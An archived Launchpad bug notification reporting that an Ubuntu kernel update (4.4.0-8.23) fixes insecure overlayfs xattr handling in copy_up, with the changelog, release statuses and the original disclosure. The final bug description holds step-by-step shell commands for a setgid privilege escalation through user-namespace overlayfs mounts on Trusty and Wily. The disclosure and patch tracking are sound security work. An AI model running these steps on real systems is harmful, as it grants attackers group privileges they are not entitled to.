group.of.nepali.translators team mailing list archive
-
group.of.nepali.translators team
-
Mailing list archive
-
Message #00898
[Bug 1534961] Re: insecure overlayfs xattrs handling in copy_up
This bug was fixed in the package linux - 4.4.0-8.23
---------------
linux (4.4.0-8.23) xenial; urgency=low
* cgroup namespace mounts broken in containers (LP: #1549398)
- SAUCE: kernfs: Always set super block owner to init_user_ns
* 4.4.0-7.22 no longer boots on arm64 (LP: #1547718)
- arm64: mm: avoid calling apply_to_page_range on empty range
- UBUNTU SAUCE: arm: mm: avoid calling apply_to_page_range on empty range
* kernel install failed /bin/cp: cannot stat ‘/boot/initrd.img-4.3.0-7-generic’: No such file or directory (LP: #1536810)
- [Config] postinst -- handle recreating symlinks when a real file is present
* insecure overlayfs xattrs handling in copy_up (LP: #1534961)
- SAUCE: cred: Add clone_cred() interface
- SAUCE: overlayfs: Use mounter's credentials instead of selectively raising caps
- SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs
- SAUCE: overlayfs: Be more careful about copying up sxid files
- SAUCE: overlayfs: Propogate nosuid from lower and upper mounts
* overlayfs over fuse should refuse copy_up of files if uid/gid not mapped (LP: #1535150)
- SAUCE: cred: Add clone_cred() interface
- SAUCE: overlayfs: Use mounter's credentials instead of selectively raising caps
- SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs
- SAUCE: overlayfs: Be more careful about copying up sxid files
- SAUCE: overlayfs: Propogate nosuid from lower and upper mounts
* overlay: mkdir fails if directory exists in lowerdir in a user namespace (LP: #1531747)
- SAUCE: cred: Add clone_cred() interface
- SAUCE: overlayfs: Use mounter's credentials instead of selectively raising caps
- SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs
* Update Intel ethernet drivers to Fortville SW5 (LP: #1547674)
- net: bulk free infrastructure for NAPI context, use napi_consume_skb
- net: Add eth_platform_get_mac_address() helper.
- i40e: Add mac_filter_element at the end of the list instead of HEAD
- i40e/i40evf: Fix RSS rx-flow-hash configuration through ethtool
- i40e: Replace X722 mac check in ethtool get_settings
- i40evf: allow channel bonding of VFs
- i40e: define function capabilities in only one place
- i40evf: null out ring pointers on free
- i40e: Cleanup the code with respect to restarting autoneg
- i40e: update features with right offload
- i40e: bump version to 1.4.10
- i40e: add new device IDs for X722
- i40e: Extend ethtool RSS hooks for X722
- i40e/i40evf: Fix for UDP/TCP RSS for X722
- i40evf: add new write-back mode
- i40e/i40evf: Use private workqueue
- i40e: add new proxy-wol bit for X722
- i40e: Limit DCB FW version checks to X710/XL710 devices
- i40e: AQ Add Run PHY Activity struct
- i40e: AQ Geneve cloud tunnel type
- i40e: AQ Add external power class to get link status
- i40e: add 100Mb ethtool reporting
- ixgbe: bulk free SKBs during TX completion cleanup cycle
- igb: Remove unnecessary flag setting in igb_set_flag_queue_pairs()
- igb: Unpair the queues when changing the number of queues
- igb/igbvf: don't give up
- igb: clean up code for setting MAC address
- igb: Refactor VFTA configuration
- igb: Allow asymmetric configuration of MTU versus Rx frame size
- igb: Do not factor VLANs into RLPML calculation
- igb: Always enable VLAN 0 even if 8021q is not loaded
- igb: Merge VLVF configuration into igb_vfta_set
- igb: Clean-up configuration of VF port VLANs
- igb: Add support for VLAN promiscuous with SR-IOV and NTUPLE
- igb: Drop unnecessary checks in transmit path
- igb: Enable use of "bridge fdb add" to set unicast table entries
- igb: Add workaround for VLAN tag stripping on 82576
- i40e: AQ Shared resource flags
- i40e: AQ Add set_switch_config
- i40e: AQ Add VXLAN-GPE tunnel type
- i40e: AQ thermal sensor control struct
- i40e: Bump AQ minor version to 1.5 for new FW features
- i40e: Store lan_vsi_idx and lan_vsi_id in the right size
- i40e: fix write-back-on-itr to work with legacy itr
- i40e: add counter for arq overflows
- i40e: add 20G speed for Tx bandwidth calculations
- i40e: refactor DCB function
- i40e: add a little more to an NVM update debug message
- i40evf: enable bus master after reset
- i40e: add netdev info to VSI dump
- i40e: remove VF device IDs from PF
- i40e: trivial: remove unnecessary local var
- i40e/i40evf: Bump i40e to 1.4.11 and i40evf to 1.4.7
- net: ixgbe: add minimal parser details for ixgbe
- i40e: trivial: drop duplicate definition
- i40e: trivial: fix missing space
- i40e: fix bug in dma sync
- i40e: do TSO only if CHECKSUM_PARTIAL is set
- i40e: allocate memory safer
- i40e: fix: do not sleep in netdev_ops
- i40e: APIs to Add/remove port mirroring rules
- i40e: negate PHY int mask bits
- i40e: drop unused function
- i40e: count allocation errors
- i40e: avoid large memcpy by assigning struct
- i40e/i40evf: bump version to 1.4.12/1.4.8
- i40e: Enable Geneve offload for FW API ver > 1.4 for XL710/X710 devices
- i40e: add priv flag for automatic rule eviction
- i40e: use eth_platform_get_mac_address()
- i40e: move sync_vsi_filters up in service_task
- i40e: Make the DCB firmware checks for X710/XL710 only
- i40e: set shared bit for multicast filters
- i40e: add VEB stat control and remove L2 cloud filter
- i40e: use new add_veb calling with VEB stats control
- i40e: Refactor force_wb and WB_ON_ITR functionality code
- i40evf: Change vf driver string to reflect all products i40evf supports
- i40e/i40evf: don't lose interrupts
- i40e/i40evf: try again after failure
- i40e: dump descriptor indexes in hex
- i40e/i40evf: use __GFP_NOWARN
- i40e/i40evf: use pages correctly in Rx
- i40e/i40evf: use logical operators, not bitwise
- i40e: properly show packet split status in debugfs
- i40e/i40evf: Bump version
- ixgbe: use u32 instead of __u32 in model header
- ixgbe: fix dates on header of ixgbe_model.h
- i40e: get rid of magic number
- i40e: drop unused debugfs file "dump"
- i40evf: support packet split receive
- i40e: trivial: cleanup use of pf->hw
- i40e: Add a SW workaround for lost interrupts
- i40e: Fix PROMISC mode for Multi-function per port (MFP) devices
- i40e: Removal of code which relies on BASE VEB SEID
- i40e/i40evf: avoid atomics
- i40e: Do not disable queues in the Legacy/MSI Interrupt handler
- i40e: expand comment
- i40e: better error reporting for nvmupdate
- i40evf: set adapter state on reset failure
- i40e: clean event descriptor before use
- i40e: When in promisc mode apply promisc mode to Tx Traffic as well
- i40e/i40evf: Bump i40e to 1.4.15 and i40evf to 1.4.11.
- i40e/i40evf: Drop outer checksum offload that was not requested
- i40e/i40evf: Use u64 values instead of casting them in TSO function
- i40e/i40evf: Factor out L4 header and checksum from L3 bits in TSO path
- i40e/i40evf: Consolidate all header changes into TSO function
- i40e/i40evf: Replace header pointers with unions of pointers in Tx checksum path
- i40e/i40evf: Add support for IPv4 encapsulated in IPv6
- i40e/i40evf: Handle IPv6 extension headers in checksum offload
- i40e/i40evf: Do not write to descriptor unless we complete
- i40e/i40evf: Add exception handling for Tx checksum
- i40e/i40evf: Clean-up Rx packet checksum handling
- i40e/i40evf: Enable support for SKB_GSO_UDP_TUNNEL_CSUM
- i40e: Fix ATR in relation to tunnels
- i40e: Do not drop support for IPv6 VXLAN or GENEVE tunnels
- i40e: Update feature flags to reflect newly enabled features
- i40evf: Update feature flags to reflect newly enabled features
- i40e: Add support for ATR w/ IPv6 extension headers
- i40e/i40evf: Break up xmit_descriptor_count from maybe_stop_tx
- i40e/i40evf: Rewrite logic for 8 descriptor per packet check
- i40e/i40evf: Move Tx checksum closer to TSO
- i40e: Add functions to blink led on 10GBaseT PHY
- i40e: Fix led blink capability for 10GBaseT PHY
- i40e: Increase timeout when checking GLGEN_RSTAT_DEVSTATE bit
- i40e: Do not wait for Rx queue disable in DCB reconfig
- i40e: Fix for unexpected messaging
- i40e: Expose some registers to program parser, FD and RSS logic
- i40e: add check for null VSI
- i40e: add adminq commands for Rx CTL registers
- i40e: implement and use Rx CTL helper functions
- i40e: Use the new rx ctl register helpers. Don't use AQ calls from clear_hw.
- i40e: suspend scheduling during driver unload
- i40e: let go of the past
- i40e/i40evf: Bump i40e to 1.4.25 and i40evf to 1.4.15
* MPT3SAS Driver update for next kernel release (LP: #1512221)
- mpt3sas: A correction in unmap_resources
- mpt3sas: Added support for high port count HBA variants.
- mpt3sas: Used IEEE SGL instead of MPI SGL while framing a SMP Passthrough request message.
- mpt3sas: Fix static analyzer(coverity) tool identified defects
- mpt3sas: Never block the Enclosure device
- mpt3sas: Make use of additional HighPriority credit message frames for sending SCSI IO's
- mpt3sas: Added smp_affinity_enable module parameter.
- mpt3sas: Add support for configurable Chain Frame Size
- mpt3sas: Updated MPI Header to 2.00.42
- mpt3sas: Fix for Asynchronous completion of timedout IO and task abort of timedout IO.
- mpt3sas: Updating mpt3sas driver version to 12.100.00.00
- mpt3sas: Remove cpumask_clear for zalloc_cpumask_var and don't free free_cpu_mask_var before reply_q
* /sys/class/scsi_host/hostN/partition_number and .../mad_version showing up BE on LE Ubuntu. (ibmvscsi) (LP: #1547153)
- ibmvscsi: Add endian conversions to sysfs attribute show functions
* Miscellaneous Ubuntu changes
- [Packaging] git-ubuntu-log -- output should be utf-8
- [Packaging] git-ubuntu-log -- handle invalid or private bugs
-- Andy Whitcroft <apw@xxxxxxxxxxxxx> Wed, 24 Feb 2016 20:34:49 +0000
** Changed in: linux (Ubuntu Xenial)
Status: Confirmed => Fix Released
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1534961
Title:
insecure overlayfs xattrs handling in copy_up
Status in linux package in Ubuntu:
Fix Released
Status in linux-armadaxp package in Ubuntu:
Invalid
Status in linux-flo package in Ubuntu:
New
Status in linux-goldfish package in Ubuntu:
New
Status in linux-lts-quantal package in Ubuntu:
Invalid
Status in linux-lts-raring package in Ubuntu:
Invalid
Status in linux-lts-saucy package in Ubuntu:
Invalid
Status in linux-lts-trusty package in Ubuntu:
Invalid
Status in linux-lts-utopic package in Ubuntu:
Invalid
Status in linux-lts-vivid package in Ubuntu:
Invalid
Status in linux-lts-wily package in Ubuntu:
Invalid
Status in linux-lts-xenial package in Ubuntu:
Invalid
Status in linux-mako package in Ubuntu:
New
Status in linux-manta package in Ubuntu:
New
Status in linux-raspi2 package in Ubuntu:
New
Status in linux-ti-omap4 package in Ubuntu:
Invalid
Status in linux source package in Precise:
New
Status in linux-armadaxp source package in Precise:
New
Status in linux-flo source package in Precise:
Invalid
Status in linux-goldfish source package in Precise:
Invalid
Status in linux-lts-quantal source package in Precise:
Invalid
Status in linux-lts-raring source package in Precise:
Invalid
Status in linux-lts-saucy source package in Precise:
Invalid
Status in linux-lts-trusty source package in Precise:
Fix Released
Status in linux-lts-utopic source package in Precise:
Invalid
Status in linux-lts-vivid source package in Precise:
Invalid
Status in linux-lts-wily source package in Precise:
Invalid
Status in linux-lts-xenial source package in Precise:
Invalid
Status in linux-mako source package in Precise:
Invalid
Status in linux-manta source package in Precise:
Invalid
Status in linux-raspi2 source package in Precise:
Invalid
Status in linux-ti-omap4 source package in Precise:
New
Status in linux source package in Trusty:
Fix Released
Status in linux-armadaxp source package in Trusty:
Invalid
Status in linux-flo source package in Trusty:
Invalid
Status in linux-goldfish source package in Trusty:
Invalid
Status in linux-lts-quantal source package in Trusty:
Invalid
Status in linux-lts-raring source package in Trusty:
Invalid
Status in linux-lts-saucy source package in Trusty:
Invalid
Status in linux-lts-trusty source package in Trusty:
Invalid
Status in linux-lts-utopic source package in Trusty:
Fix Released
Status in linux-lts-vivid source package in Trusty:
Fix Released
Status in linux-lts-wily source package in Trusty:
Fix Released
Status in linux-lts-xenial source package in Trusty:
New
Status in linux-mako source package in Trusty:
Invalid
Status in linux-manta source package in Trusty:
Invalid
Status in linux-raspi2 source package in Trusty:
Invalid
Status in linux-ti-omap4 source package in Trusty:
Invalid
Status in linux source package in Vivid:
Fix Released
Status in linux-armadaxp source package in Vivid:
New
Status in linux-flo source package in Vivid:
New
Status in linux-goldfish source package in Vivid:
New
Status in linux-lts-quantal source package in Vivid:
New
Status in linux-lts-raring source package in Vivid:
New
Status in linux-lts-saucy source package in Vivid:
New
Status in linux-lts-trusty source package in Vivid:
New
Status in linux-lts-utopic source package in Vivid:
New
Status in linux-lts-vivid source package in Vivid:
New
Status in linux-lts-wily source package in Vivid:
New
Status in linux-lts-xenial source package in Vivid:
New
Status in linux-mako source package in Vivid:
New
Status in linux-manta source package in Vivid:
New
Status in linux-raspi2 source package in Vivid:
New
Status in linux-ti-omap4 source package in Vivid:
New
Status in linux source package in Wily:
Fix Released
Status in linux-armadaxp source package in Wily:
Invalid
Status in linux-flo source package in Wily:
New
Status in linux-goldfish source package in Wily:
New
Status in linux-lts-quantal source package in Wily:
Invalid
Status in linux-lts-raring source package in Wily:
Invalid
Status in linux-lts-saucy source package in Wily:
Invalid
Status in linux-lts-trusty source package in Wily:
Invalid
Status in linux-lts-utopic source package in Wily:
Invalid
Status in linux-lts-vivid source package in Wily:
Invalid
Status in linux-lts-wily source package in Wily:
Invalid
Status in linux-lts-xenial source package in Wily:
Invalid
Status in linux-mako source package in Wily:
New
Status in linux-manta source package in Wily:
New
Status in linux-raspi2 source package in Wily:
Fix Released
Status in linux-ti-omap4 source package in Wily:
Invalid
Status in linux source package in Xenial:
Fix Released
Status in linux-armadaxp source package in Xenial:
Invalid
Status in linux-flo source package in Xenial:
New
Status in linux-goldfish source package in Xenial:
New
Status in linux-lts-quantal source package in Xenial:
Invalid
Status in linux-lts-raring source package in Xenial:
Invalid
Status in linux-lts-saucy source package in Xenial:
Invalid
Status in linux-lts-trusty source package in Xenial:
Invalid
Status in linux-lts-utopic source package in Xenial:
Invalid
Status in linux-lts-vivid source package in Xenial:
Invalid
Status in linux-lts-wily source package in Xenial:
Invalid
Status in linux-lts-xenial source package in Xenial:
Invalid
Status in linux-mako source package in Xenial:
New
Status in linux-manta source package in Xenial:
New
Status in linux-raspi2 source package in Xenial:
New
Status in linux-ti-omap4 source package in Xenial:
Invalid
Bug description:
On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to
gain group privileges of arbitrary groups that created directories
with properties to be found using "find / -perm -02020", e.g.
/usr/local/lib/python3.4 root.staff
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail
For Ubuntu Trusty, following sequence can be used to reproduce the
problem:
* In user/mount namespace:
rm -rf Mnt Test
mkdir Mnt Test
mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt
* Outside namespace
setfacl -m d:u:[your unpriv uid]:rwx Test
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd
For Ubuntu Wily:
* Inside:
mkdir Mnt Test Work
mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt
* Outside:
setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd
CreateSetgidBinary is from
http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
See also http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ (InvitedOnly/lY9yHKQj) and attached sharing policy.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1534961/+subscriptions